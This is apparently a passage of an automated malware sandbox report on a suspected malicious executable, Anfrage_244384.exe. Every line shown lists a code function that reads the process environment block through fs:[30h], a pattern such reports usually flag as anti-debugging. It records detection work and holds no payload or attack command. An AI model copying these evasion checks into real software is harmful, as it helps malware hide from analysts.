Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472F453 mov eax, dword ptr fs:[00000030h]	4_2_3472F453
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471B450 mov eax, dword ptr fs:[00000030h]	4_2_3471B450
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471B450 mov eax, dword ptr fs:[00000030h]	4_2_3471B450
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471B450 mov eax, dword ptr fs:[00000030h]	4_2_3471B450
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471B450 mov eax, dword ptr fs:[00000030h]	4_2_3471B450
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B440 mov eax, dword ptr fs:[00000030h]	4_2_3467B440
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B440 mov eax, dword ptr fs:[00000030h]	4_2_3467B440
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B440 mov eax, dword ptr fs:[00000030h]	4_2_3467B440
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B440 mov eax, dword ptr fs:[00000030h]	4_2_3467B440
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B440 mov eax, dword ptr fs:[00000030h]	4_2_3467B440
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B440 mov eax, dword ptr fs:[00000030h]	4_2_3467B440
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469340D mov eax, dword ptr fs:[00000030h]	4_2_3469340D
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F7410 mov eax, dword ptr fs:[00000030h]	4_2_346F7410
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347414F6 mov eax, dword ptr fs:[00000030h]	4_2_347414F6
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347414F6 mov eax, dword ptr fs:[00000030h]	4_2_347414F6
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347194E0 mov eax, dword ptr fs:[00000030h]	4_2_347194E0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347454DB mov eax, dword ptr fs:[00000030h]	4_2_347454DB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346674B0 mov eax, dword ptr fs:[00000030h]	4_2_346674B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346674B0 mov eax, dword ptr fs:[00000030h]	4_2_346674B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A34B0 mov eax, dword ptr fs:[00000030h]	4_2_346A34B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34679486 mov eax, dword ptr fs:[00000030h]	4_2_34679486
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34679486 mov eax, dword ptr fs:[00000030h]	4_2_34679486
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B480 mov eax, dword ptr fs:[00000030h]	4_2_3466B480
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B562 mov eax, dword ptr fs:[00000030h]	4_2_3466B562
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346AB570 mov eax, dword ptr fs:[00000030h]	4_2_346AB570
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346AB570 mov eax, dword ptr fs:[00000030h]	4_2_346AB570
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471B550 mov eax, dword ptr fs:[00000030h]	4_2_3471B550
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471B550 mov eax, dword ptr fs:[00000030h]	4_2_3471B550
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471B550 mov eax, dword ptr fs:[00000030h]	4_2_3471B550
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34745537 mov eax, dword ptr fs:[00000030h]	4_2_34745537
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467D534 mov eax, dword ptr fs:[00000030h]	4_2_3467D534
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467D534 mov eax, dword ptr fs:[00000030h]	4_2_3467D534
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467D534 mov eax, dword ptr fs:[00000030h]	4_2_3467D534
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467D534 mov eax, dword ptr fs:[00000030h]	4_2_3467D534
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467D534 mov eax, dword ptr fs:[00000030h]	4_2_3467D534
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467D534 mov eax, dword ptr fs:[00000030h]	4_2_3467D534
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471F525 mov eax, dword ptr fs:[00000030h]	4_2_3471F525
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471F525 mov eax, dword ptr fs:[00000030h]	4_2_3471F525
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471F525 mov eax, dword ptr fs:[00000030h]	4_2_3471F525
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471F525 mov eax, dword ptr fs:[00000030h]	4_2_3471F525
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471F525 mov eax, dword ptr fs:[00000030h]	4_2_3471F525
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471F525 mov eax, dword ptr fs:[00000030h]	4_2_3471F525
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471F525 mov eax, dword ptr fs:[00000030h]	4_2_3471F525
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346AD530 mov eax, dword ptr fs:[00000030h]	4_2_346AD530
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346AD530 mov eax, dword ptr fs:[00000030h]	4_2_346AD530
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472B52F mov eax, dword ptr fs:[00000030h]	4_2_3472B52F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A7505 mov eax, dword ptr fs:[00000030h]	4_2_346A7505
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A7505 mov ecx, dword ptr fs:[00000030h]	4_2_346A7505
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915F4 mov eax, dword ptr fs:[00000030h]	4_2_346915F4
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915F4 mov eax, dword ptr fs:[00000030h]	4_2_346915F4
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915F4 mov eax, dword ptr fs:[00000030h]	4_2_346915F4
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915F4 mov eax, dword ptr fs:[00000030h]	4_2_346915F4
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915F4 mov eax, dword ptr fs:[00000030h]	4_2_346915F4
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915F4 mov eax, dword ptr fs:[00000030h]	4_2_346915F4
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347435D7 mov eax, dword ptr fs:[00000030h]	4_2_347435D7
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347435D7 mov eax, dword ptr fs:[00000030h]	4_2_347435D7
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347435D7 mov eax, dword ptr fs:[00000030h]	4_2_347435D7
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A55C0 mov eax, dword ptr fs:[00000030h]	4_2_346A55C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346995DA mov eax, dword ptr fs:[00000030h]	4_2_346995DA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347455C9 mov eax, dword ptr fs:[00000030h]	4_2_347455C9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ED5D0 mov eax, dword ptr fs:[00000030h]	4_2_346ED5D0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ED5D0 mov ecx, dword ptr fs:[00000030h]	4_2_346ED5D0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915A9 mov eax, dword ptr fs:[00000030h]	4_2_346915A9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915A9 mov eax, dword ptr fs:[00000030h]	4_2_346915A9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915A9 mov eax, dword ptr fs:[00000030h]	4_2_346915A9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915A9 mov eax, dword ptr fs:[00000030h]	4_2_346915A9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346915A9 mov eax, dword ptr fs:[00000030h]	4_2_346915A9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3470D5B0 mov eax, dword ptr fs:[00000030h]	4_2_3470D5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3470D5B0 mov eax, dword ptr fs:[00000030h]	4_2_3470D5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347435B6 mov eax, dword ptr fs:[00000030h]	4_2_347435B6
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347035BA mov eax, dword ptr fs:[00000030h]	4_2_347035BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347035BA mov eax, dword ptr fs:[00000030h]	4_2_347035BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347035BA mov eax, dword ptr fs:[00000030h]	4_2_347035BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347035BA mov eax, dword ptr fs:[00000030h]	4_2_347035BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472F5BE mov eax, dword ptr fs:[00000030h]	4_2_3472F5BE
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h]	4_2_3469F5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h]	4_2_3469F5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h]	4_2_3469F5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h]	4_2_3469F5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h]	4_2_3469F5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h]	4_2_3469F5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h]	4_2_3469F5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h]	4_2_3469F5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469F5B0 mov eax, dword ptr fs:[00000030h]	4_2_3469F5B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466758F mov eax, dword ptr fs:[00000030h]	4_2_3466758F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466758F mov eax, dword ptr fs:[00000030h]	4_2_3466758F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466758F mov eax, dword ptr fs:[00000030h]	4_2_3466758F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FB594 mov eax, dword ptr fs:[00000030h]	4_2_346FB594
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FB594 mov eax, dword ptr fs:[00000030h]	4_2_346FB594
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A9660 mov eax, dword ptr fs:[00000030h]	4_2_346A9660
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A9660 mov eax, dword ptr fs:[00000030h]	4_2_346A9660
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3470D660 mov eax, dword ptr fs:[00000030h]	4_2_3470D660
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F626 mov eax, dword ptr fs:[00000030h]	4_2_3466F626
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F626 mov eax, dword ptr fs:[00000030h]	4_2_3466F626
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F626 mov eax, dword ptr fs:[00000030h]	4_2_3466F626
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F626 mov eax, dword ptr fs:[00000030h]	4_2_3466F626
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F626 mov eax, dword ptr fs:[00000030h]	4_2_3466F626
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F626 mov eax, dword ptr fs:[00000030h]	4_2_3466F626
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F626 mov eax, dword ptr fs:[00000030h]	4_2_3466F626
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F626 mov eax, dword ptr fs:[00000030h]	4_2_3466F626
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F626 mov eax, dword ptr fs:[00000030h]	4_2_3466F626
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34745636 mov eax, dword ptr fs:[00000030h]	4_2_34745636
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346AF603 mov eax, dword ptr fs:[00000030h]	4_2_346AF603
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A1607 mov eax, dword ptr fs:[00000030h]	4_2_346A1607
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34673616 mov eax, dword ptr fs:[00000030h]	4_2_34673616
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34673616 mov eax, dword ptr fs:[00000030h]	4_2_34673616
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472D6F0 mov eax, dword ptr fs:[00000030h]	4_2_3472D6F0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A36EF mov eax, dword ptr fs:[00000030h]	4_2_346A36EF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469D6E0 mov eax, dword ptr fs:[00000030h]	4_2_3469D6E0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469D6E0 mov eax, dword ptr fs:[00000030h]	4_2_3469D6E0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347036EE mov eax, dword ptr fs:[00000030h]	4_2_347036EE
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347036EE mov eax, dword ptr fs:[00000030h]	4_2_347036EE
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347036EE mov eax, dword ptr fs:[00000030h]	4_2_347036EE
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347036EE mov eax, dword ptr fs:[00000030h]	4_2_347036EE
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347036EE mov eax, dword ptr fs:[00000030h]	4_2_347036EE
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347036EE mov eax, dword ptr fs:[00000030h]	4_2_347036EE
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A16CF mov eax, dword ptr fs:[00000030h]	4_2_346A16CF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B6C0 mov eax, dword ptr fs:[00000030h]	4_2_3467B6C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B6C0 mov eax, dword ptr fs:[00000030h]	4_2_3467B6C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B6C0 mov eax, dword ptr fs:[00000030h]	4_2_3467B6C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B6C0 mov eax, dword ptr fs:[00000030h]	4_2_3467B6C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B6C0 mov eax, dword ptr fs:[00000030h]	4_2_3467B6C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467B6C0 mov eax, dword ptr fs:[00000030h]	4_2_3467B6C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472F6C7 mov eax, dword ptr fs:[00000030h]	4_2_3472F6C7
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347316CC mov eax, dword ptr fs:[00000030h]	4_2_347316CC
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347316CC mov eax, dword ptr fs:[00000030h]	4_2_347316CC
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347316CC mov eax, dword ptr fs:[00000030h]	4_2_347316CC
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347316CC mov eax, dword ptr fs:[00000030h]	4_2_347316CC
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466D6AA mov eax, dword ptr fs:[00000030h]	4_2_3466D6AA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466D6AA mov eax, dword ptr fs:[00000030h]	4_2_3466D6AA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346676B2 mov eax, dword ptr fs:[00000030h]	4_2_346676B2
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346676B2 mov eax, dword ptr fs:[00000030h]	4_2_346676B2
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346676B2 mov eax, dword ptr fs:[00000030h]	4_2_346676B2
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F368C mov eax, dword ptr fs:[00000030h]	4_2_346F368C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F368C mov eax, dword ptr fs:[00000030h]	4_2_346F368C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F368C mov eax, dword ptr fs:[00000030h]	4_2_346F368C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F368C mov eax, dword ptr fs:[00000030h]	4_2_346F368C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B765 mov eax, dword ptr fs:[00000030h]	4_2_3466B765
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B765 mov eax, dword ptr fs:[00000030h]	4_2_3466B765
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B765 mov eax, dword ptr fs:[00000030h]	4_2_3466B765
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466B765 mov eax, dword ptr fs:[00000030h]	4_2_3466B765
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683740 mov eax, dword ptr fs:[00000030h]	4_2_34683740
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683740 mov eax, dword ptr fs:[00000030h]	4_2_34683740
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683740 mov eax, dword ptr fs:[00000030h]	4_2_34683740
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471375F mov eax, dword ptr fs:[00000030h]	4_2_3471375F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471375F mov eax, dword ptr fs:[00000030h]	4_2_3471375F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471375F mov eax, dword ptr fs:[00000030h]	4_2_3471375F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471375F mov eax, dword ptr fs:[00000030h]	4_2_3471375F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471375F mov eax, dword ptr fs:[00000030h]	4_2_3471375F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34743749 mov eax, dword ptr fs:[00000030h]	4_2_34743749
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34673720 mov eax, dword ptr fs:[00000030h]	4_2_34673720
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474B73C mov eax, dword ptr fs:[00000030h]	4_2_3474B73C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474B73C mov eax, dword ptr fs:[00000030h]	4_2_3474B73C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474B73C mov eax, dword ptr fs:[00000030h]	4_2_3474B73C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474B73C mov eax, dword ptr fs:[00000030h]	4_2_3474B73C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468F720 mov eax, dword ptr fs:[00000030h]	4_2_3468F720
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468F720 mov eax, dword ptr fs:[00000030h]	4_2_3468F720
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3468F720 mov eax, dword ptr fs:[00000030h]	4_2_3468F720
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34669730 mov eax, dword ptr fs:[00000030h]	4_2_34669730
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34669730 mov eax, dword ptr fs:[00000030h]	4_2_34669730
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473972B mov eax, dword ptr fs:[00000030h]	4_2_3473972B
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472F72E mov eax, dword ptr fs:[00000030h]	4_2_3472F72E
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467973A mov eax, dword ptr fs:[00000030h]	4_2_3467973A
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467973A mov eax, dword ptr fs:[00000030h]	4_2_3467973A
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A5734 mov eax, dword ptr fs:[00000030h]	4_2_346A5734
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34677703 mov eax, dword ptr fs:[00000030h]	4_2_34677703
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34675702 mov eax, dword ptr fs:[00000030h]	4_2_34675702
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34675702 mov eax, dword ptr fs:[00000030h]	4_2_34675702
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346AF71F mov eax, dword ptr fs:[00000030h]	4_2_346AF71F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346AF71F mov eax, dword ptr fs:[00000030h]	4_2_346AF71F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3467D7E0 mov ecx, dword ptr fs:[00000030h]	4_2_3467D7E0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346757C0 mov eax, dword ptr fs:[00000030h]	4_2_346757C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346757C0 mov eax, dword ptr fs:[00000030h]	4_2_346757C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346757C0 mov eax, dword ptr fs:[00000030h]	4_2_346757C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FF7AF mov eax, dword ptr fs:[00000030h]	4_2_346FF7AF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FF7AF mov eax, dword ptr fs:[00000030h]	4_2_346FF7AF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FF7AF mov eax, dword ptr fs:[00000030h]	4_2_346FF7AF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FF7AF mov eax, dword ptr fs:[00000030h]	4_2_346FF7AF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FF7AF mov eax, dword ptr fs:[00000030h]	4_2_346FF7AF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_347437B6 mov eax, dword ptr fs:[00000030h]	4_2_347437B6
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472D7B0 mov eax, dword ptr fs:[00000030h]	4_2_3472D7B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472D7B0 mov eax, dword ptr fs:[00000030h]	4_2_3472D7B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F97A9 mov eax, dword ptr fs:[00000030h]	4_2_346F97A9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469D7B0 mov eax, dword ptr fs:[00000030h]	4_2_3469D7B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F7BA mov eax, dword ptr fs:[00000030h]	4_2_3466F7BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F7BA mov eax, dword ptr fs:[00000030h]	4_2_3466F7BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F7BA mov eax, dword ptr fs:[00000030h]	4_2_3466F7BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F7BA mov eax, dword ptr fs:[00000030h]	4_2_3466F7BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F7BA mov eax, dword ptr fs:[00000030h]	4_2_3466F7BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F7BA mov eax, dword ptr fs:[00000030h]	4_2_3466F7BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F7BA mov eax, dword ptr fs:[00000030h]	4_2_3466F7BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F7BA mov eax, dword ptr fs:[00000030h]	4_2_3466F7BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466F7BA mov eax, dword ptr fs:[00000030h]	4_2_3466F7BA
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472F78A mov eax, dword ptr fs:[00000030h]	4_2_3472F78A
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F106E mov eax, dword ptr fs:[00000030h]	4_2_346F106E
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34745060 mov eax, dword ptr fs:[00000030h]	4_2_34745060
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681070 mov eax, dword ptr fs:[00000030h]	4_2_34681070
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681070 mov ecx, dword ptr fs:[00000030h]	4_2_34681070
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681070 mov eax, dword ptr fs:[00000030h]	4_2_34681070
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681070 mov eax, dword ptr fs:[00000030h]	4_2_34681070
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681070 mov eax, dword ptr fs:[00000030h]	4_2_34681070
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681070 mov eax, dword ptr fs:[00000030h]	4_2_34681070
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681070 mov eax, dword ptr fs:[00000030h]	4_2_34681070
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681070 mov eax, dword ptr fs:[00000030h]	4_2_34681070
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681070 mov eax, dword ptr fs:[00000030h]	4_2_34681070
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681070 mov eax, dword ptr fs:[00000030h]	4_2_34681070
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681070 mov eax, dword ptr fs:[00000030h]	4_2_34681070
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681070 mov eax, dword ptr fs:[00000030h]	4_2_34681070
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681070 mov eax, dword ptr fs:[00000030h]	4_2_34681070
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ED070 mov ecx, dword ptr fs:[00000030h]	4_2_346ED070
